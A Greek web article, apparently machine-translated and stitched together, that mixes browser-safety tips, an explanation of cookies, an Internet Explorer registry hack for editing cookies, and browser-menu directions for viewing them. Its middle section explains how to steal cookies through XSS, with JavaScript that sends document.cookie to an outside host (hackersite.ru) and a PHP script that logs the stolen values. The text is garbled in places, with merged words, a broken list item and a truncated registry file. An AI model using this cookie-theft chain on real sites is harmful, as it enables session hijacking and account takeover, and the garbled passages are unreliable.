  5. Μην χρησιμοποιείτε τη λειτουργία "Αποθήκευση κωδικού πρόσβασης" του προγράμματος περιήγησής σας. Τα αποθηκευμένα δεδομένα εγγραφής αυξάνουν τον κίνδυνο κλοπής κατά καιρούς. Μην τεμπελιάζετε, μην αφιερώνετε λίγα λεπτά για να εισάγετε κωδικό πρόσβασης και να συνδεθείτε στην αρχή κάθε συνεδρίας.
  6. Μετά την περιήγηση στο διαδίκτυο - επίσκεψη σε κοινωνικά δίκτυα, φόρουμ, συνομιλίες, ιστότοπους - διαγράψτε τα αποθηκευμένα cookie και εκκαθαρίστε την προσωρινή μνήμη του προγράμματος περιήγησης.
  7. Ενημερώνετε τακτικά προγράμματα περιήγησης και λογισμικό προστασίας από ιούς.
  8. Χρησιμοποιήστε επεκτάσεις προγράμματος περιήγησης που προστατεύουν από επιθέσεις XSS (για παράδειγμα, NoScript για FF και Google Chrome).
  9. Περιοδικά σε λογαριασμούς.

Και το πιο σημαντικό - μην χάνετε την επαγρύπνηση και την προσοχή ενώ χαλαρώνετε ή εργάζεστε στο Διαδίκτυο!

Τι είναι ένα cookie;

Υπάρχει ένας μηχανισμός που επιτρέπει στον διακομιστή http να αποθηκεύσει στον υπολογιστή του χρήστη μερικά πληροφορίες κειμένουκαι μετά επικοινωνήστε μαζί της. Αυτή η πληροφορίαονομάζεται cookie. Στην πραγματικότητα, κάθε cookie είναι ένα ζευγάρι: το όνομα της παραμέτρου και η τιμή της. Σε κάθε cookie εκχωρείται επίσης ο τομέας στον οποίο ανήκει. Για λόγους ασφαλείας, σε όλα τα προγράμματα περιήγησης, ο διακομιστής http επιτρέπεται μόνο να έχει πρόσβαση στο δικό του cookie τομέα. Επιπλέον, τα cookie μπορεί να έχουν ημερομηνία λήξης, οπότε θα αποθηκευτούν στον υπολογιστή μέχρι αυτή την ημερομηνία, ακόμα κι αν όλα τα παράθυρα του προγράμματος περιήγησης είναι κλειστά.


Γιατί είναι σημαντικά τα cookies;

Σε όλα τα συστήματα πολλών χρηστών, τα cookies χρησιμοποιούνται για την αναγνώριση του χρήστη. Ή μάλλον, η τρέχουσα σύνδεση του χρήστη με την υπηρεσία, η συνεδρία χρήστη. Εάν κάποιος αναγνωρίσει τα cookies σας, μπορεί να συνδεθεί για λογαριασμό σας. Επειδή μέσα αυτή τη στιγμήΠολύ λίγοι πόροι του Διαδικτύου ελέγχουν την αλλαγή της διεύθυνσης IP κατά τη διάρκεια μιας περιόδου λειτουργίας χρήστη.


Πώς να αλλάξετε ή να αλλάξετε τα cookies;

Οι προγραμματιστές προγραμμάτων περιήγησης δεν παρέχουν ενσωματωμένα εργαλεία για την επεξεργασία των cookies. Αλλά μπορείτε να τα βγάλετε πέρα ​​με ένα κανονικό σημειωματάριο (σημειωματάριο).


Βήμα 1: δημιουργία αρχείο κειμένουμε κείμενο

Windows Επεξεργαστής ΜητρώουΈκδοση 5.00



@="C:\\IE_ext.htm"

Το αποθηκεύουμε με το όνομα IE_ext.reg

Βήμα 2: Χρησιμοποιώντας το αρχείο που δημιουργήθηκε, προσθέστε αλλαγές στο μητρώο των Windows.

Βήμα 3: Δημιουργήστε ένα αρχείο κειμένου με κείμενο

< script language="javascript">
external.menuArguments.clipboardData.setData("Κείμενο" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


Αποθηκεύστε το ως C:\IE_ext.htm

Βήμα 4: Πηγαίνουμε στον ιστότοπο που μας ενδιαφέρει.

Βήμα 5: Κάντε δεξί κλικκλικ του ποντικιού ελεύθερος χώροςσελίδα και επιλέξτε το στοιχείο μενού "Εργασία με cookies". Επιτρέψτε την πρόσβαση στο πρόχειρο. Τα cookie σας για αυτόν τον ιστότοπο θα τοποθετηθούν στο πρόχειρο. Μπορείτε να επικολλήσετε το σημειωματάριό τους (σημειωματάριο) και να δείτε.


Βήμα 6: Για να αλλάξετε κάποιο cookie, επεξεργαστείτε το αρχείο C:\IE_ext.htm, αντικαθιστώντας το όνομα δοκιμήςστο όνομα του cookie, τιμή δοκιμής- για τη σημασία του, testdomain.com- στον τομέα του ιστότοπου. Προσθέστε περισσότερες γραμμές όπως αυτή εάν χρειάζεται. Για ευκολία ελέγχου, πρόσθεσα την έξοδο των τρεχόντων cookies στο σενάριο πριν και μετά την αλλαγή: alert(external.menuArguments.document.cookie);

Βήμα 7: Εκτελέστε ξανά το Βήμα 5 και, στη συνέχεια, ανανεώστε τη σελίδα.

Κατώτατη γραμμή: θα μεταβούμε σε αυτόν τον πόρο Διαδικτύου με ενημερωμένα cookies.

Πώς να κλέψετε cookies με JavaScript;

Εάν ο εισβολέας κατάφερε να βρει την ευκαιρία να εκτελέσει ένα αυθαίρετο σενάριο JavaScript στον υπολογιστή του θύματος, τότε διαβάστε τρέχοντα cookiesμπορεί πολύ εύκολα. Παράδειγμα:


varstr=document.cookie;

Αλλά θα μπορέσει να τα μεταφέρει στον ιστότοπό του, επειδή, όπως τόνισα προηγουμένως, ένα σενάριο JavaScript δεν μπορεί πρόσθετη επιβεβαίωσηπρόσβαση σε έναν ιστότοπο που βρίσκεται σε άλλο τομέα; Αποδεικνύεται ότι ένα σενάριο JavaScript μπορεί να φορτώσει οποιαδήποτε εικόνα βρίσκεται σε οποιονδήποτε διακομιστή http. Ταυτόχρονα, μεταφέρετε τυχόν πληροφορίες κειμένου στο αίτημα λήψης σε αυτήν την εικόνα. Παράδειγμα: http://hackersite.ru/xss.jpg?text_infoΈτσι, εάν εκτελέσετε αυτόν τον κωδικό:

varimg= νέα εικόνα();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


τότε τα cookies θα βρίσκονται στο αίτημα λήψης της «εικόνας» και «αφήστε» στον εισβολέα.

Πώς να χειριστείτε τέτοια αιτήματα για να ανεβάσετε μια "εικόνα";

Ένας εισβολέας χρειάζεται μόνο να βρει φιλοξενία με υποστήριξη phpκαι τοποθετήστε τον κωδικό ως εξής:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Στη συνέχεια, όλες οι παράμετροι ερωτήματος σε αυτό το σενάριο θα αποθηκευτούν στο αρχείο log.txt. Απομένει μόνο στο σενάριο JavaScript που περιγράφηκε προηγουμένως για αντικατάσταση http://hackersite.ru/xss.jpgστη διαδρομή προς αυτό το σενάριο php.


Αποτέλεσμα

Έχω δείξει μόνο τον απλούστερο τρόπο για να εκμεταλλευτούμε τα τρωτά σημεία XSS. Ωστόσο, αποδεικνύει ότι η παρουσία τουλάχιστον μίας τέτοιας ευπάθειας σε μια τοποθεσία Internet πολλών χρηστών μπορεί να επιτρέψει σε έναν εισβολέα να χρησιμοποιήσει τους πόρους του για λογαριασμό σας.

Opera ανοίξτε το κύριο μενού, μεταβείτε στην ενότητα "Ρυθμίσεις" και επιλέξτε τη γραμμή " Γενικές Ρυθμίσεις...». Και μπορείτε απλά να πατήσετε ζεστό πλήκτρα CTRL+ F12. Αυτό θα ανοίξει το παράθυρο ρυθμίσεων του προγράμματος περιήγησης, όπου στην καρτέλα "Για προχωρημένους" πρέπει να κάνετε κλικ στην ενότητα "Cookies" στο αριστερό παράθυρο. Σε αυτό, πρέπει να κάνετε κλικ στο κουμπί "Διαχείριση cookies".

ΣΤΟ Mozilla Firefoxανοίξτε την ενότητα "Εργαλεία" στο μενού και επιλέξτε το στοιχείο "Ρυθμίσεις". Στο παράθυρο ρυθμίσεων, πρέπει να μεταβείτε στην καρτέλα "Απόρρητο", να βρείτε το κουμπί εκεί που λέει "Εμφάνιση cookies ..." και κάντε κλικ σε αυτό για να αποκτήσετε πρόσβαση στη λίστα των cookies που είναι αποθηκευμένα από το πρόγραμμα περιήγησης. Εδώ μπορούν να αναζητηθούν και να προβληθούν.

Στον Internet Explorer, αναπτύξτε την ενότητα "Εργαλεία" στο μενού και επιλέξτε "Ιδιότητες". Στο παράθυρο ρυθμίσεων ιδιοκτησίας, μεταβείτε στην καρτέλα Γενικά και κάντε κλικ στο κουμπί Επιλογές στην ενότητα Ιστορικό περιήγησης. Με αυτόν τον τρόπο, θα ανοίξετε ένα άλλο παράθυρο ("Επιλογές προσωρινών αρχείων"), στο οποίο πρέπει να κάνετε κλικ στο κουμπί "Εμφάνιση αρχείων".

Κάντε κλικ στην επικεφαλίδα "Όνομα" στη λίστα περιεχομένων του φακέλου προσωρινών αρχείων του Internet Explorer που ανοίγει - με αυτόν τον τρόπο μπορείτε να ομαδοποιήσετε όλα τα cookie σε ένα μπλοκ σε έναν κοινό σωρό ετερογενών αρχείων. Εδώ μπορείτε να βρείτε το αρχείο που σας ενδιαφέρει και να το ανοίξετε σε ένα τυπικό Σημειωματάριο για προβολή ή επεξεργασία.

Στο Google Chrome, κάντε κλικ στο εικονίδιο με το κλειδί στην επάνω δεξιά γωνία του παραθύρου και επιλέξτε Επιλογές από το μενού. Το πρόγραμμα περιήγησης θα ανοίξει τη σελίδα "Ρυθμίσεις" και κάνετε κλικ στον σύνδεσμο "Για προχωρημένους" στο αριστερό του παράθυρο και στη σελίδα σύνθετων ρυθμίσεων, κάντε κλικ στο κουμπί "Ρυθμίσεις περιεχομένου". Δεν είναι ακόμα η τελευταία σελίδαστο δρόμο προς τα cookies που είναι αποθηκευμένα από αυτό το πρόγραμμα περιήγησης.

Κάντε κλικ στο κουμπί "Όλα τα cookies και τα δεδομένα ιστότοπου" στην επόμενη σελίδα και τελικά θα έχετε πρόσβαση στη λίστα των cookies.

Το Google Chrome παρέχει τη δυνατότητα αναζήτησης, προβολής και διαγραφής cookies.

Στο πρόγραμμα περιήγησης Safari, κάντε κλικ στο εικονίδιο με το γρανάζι στα δεξιά πάνω γωνίακαι επιλέξτε τη γραμμή "Ρυθμίσεις ...". Στο παράθυρο αλλαγής ρυθμίσεων, πρέπει να μεταβείτε στην καρτέλα "Ασφάλεια" για να κάνετε κλικ στο κουμπί "Εμφάνιση cookies" εκεί. Το Safari παρέχει μόνο λειτουργίες αναζήτησης και διαγραφής cookies, τα περιεχόμενα αυτών των προσωρινών αρχείων μπορούν να προβληθούν μόνο εν μέρει εδώ.